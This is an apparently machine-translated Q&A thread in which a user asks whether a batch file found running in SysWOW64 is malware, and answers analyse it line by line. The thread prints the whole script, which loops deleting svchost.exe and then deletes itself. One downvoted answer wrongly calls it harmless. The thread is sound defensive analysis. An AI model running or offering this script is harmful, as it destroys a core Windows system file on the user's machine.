É este malware (del.bat) ou uma brincadeira?

Navegue suas respostas
4

Ontem, descobri o seguinte arquivo em lote em execução na minha pasta SysWOW64: 

@Echo Off
cd /d C:\Windows\SysWOW64\
:Start
del svchost.exe
If Exist svchost.exe Goto Start
del %0

Eu descobri quando abri o gerenciador de tarefas, porque eu estava perdendo bateria como um louco. Não tenho ideia de como ele começou a ser executado, porque não havia tarefas agendadas para ele, nenhum serviço, inicialização, etc., e ele estava sendo executado sem uma janela visível (apenas cmd.exe )

Infelizmente, eu matei com pressa, já que estava maximizando recursos, então eu não peguei os argumentos, o que teria ajudado a fazer mais sentido com isso. Alguém já experimentou isso antes? Eu tentei executar o arquivo através de virustotal , que afirma que é totalmente seguro. Ou isso é uma brincadeira ou algo assim?

P.S. executando o Windows 10, totalmente atualizado. O Malwarebytes não detecta nada.

Edit: Mais algumas pesquisas me trouxeram para um malware DDos Xuhuan , mas eu não tenho as chaves de registro e outros arquivos mencionaram meu McAffe, bem como nenhum prompt de firewall de explorer.exe

Editar 2: O Virustotal está cheio de relatórios positivos agora, então eu acho que isso não é mais um problema!

    
por PulseJet 05.12.2017 / 10:08

3 respostas

3

Para o que (pequeno) vale a pena, o Malwarebytes agora detecta isso como Trojan.Agent.Trace (seu nome genérico "isso é desagradável, mas não sabemos de qual vírus é"). Eu encontrei no meu sistema, que é um desktop hardwired. Eu vivo sozinho. Eu não tenho ideia de como chegou lá, então tudo isso é bem legal.

Me lembra dos antigos vírus clássicos dos anos 90. Eles não quiseram selar suas informações de cartão de crédito ou usar o seu computador para o meu, eles só querem mexer com o Windows instalar.

    
por 22.12.2017 / 14:45
4

Vamos passar por essa linha no momento. 

@Echo Off

Os comandos do script em lote não serão impressos no console quando forem executados. 

cd /d C:\Windows\SysWOW64\

O script navega para a pasta SysWOW64 na sua unidade C:\ . A opção /d faz o script alterar a unidade atual para C:\ caso seja diferente. 

:Start

Este é um rótulo que é referido mais tarde. 

del svchost.exe

Se svchost.exe existir no diretório atual, exclua-o. Isso não o envia para a Lixeira; ele se foi para sempre, a menos que você tenha sorte com o software de recuperação de arquivos. Observe que isso exclui o executável svchost.exe usado para serviços de 32 bits executados em um sistema de 64 bits. svchost.exe também reside na sua pasta System32 , que em um sistema de 64 bits é usado para serviços de 64 bits (enquanto em um sistema de 32 bits ele é usado para serviços de 32 bits). 

If Exist svchost.exe Goto Start

Se o svchost.exe ainda existir por qualquer motivo, o script retornará para o rótulo :Start definido anteriormente e tentará executar del svchost.exe novamente até que ele seja excluído. 

del %0

Quando svchost.exe tiver sido excluído, a instrução If não retornará o loop para o rótulo e, em vez disso, executará isso. Normalmente, isso fará com que o script exclua seu próprio arquivo, mas de acordo com este comentário em uma resposta SO isso não vai funcionar como o caminho atual teria mudado?

Eu não executaria se você valorizasse seu sistema operacional.

Quanto a drenar sua bateria, posso vê-la rodando indefinidamente se não puder apagar svchost.exe (falta de elevação, arquivo em uso?). Nesse caso, o script tentaria excluir o arquivo centenas, se não milhares de vezes por segundo; Eu posso ver que espancando seu disco rígido exaurindo sua CPU (obrigado Sampo pela correção!), Assim drenando sua bateria.

    
por 05.12.2017 / 11:04
-1

Este arquivo não é um vírus. Exclui apenas o arquivo "svchost.exe" e tenta executar a tarefa (delete) se este arquivo ainda existir.

    
por 05.12.2017 / 10:16

Tags

Problema de segundo plano do Windows com duas telas Arquivo padrão do Mac OS X / etc / sudoers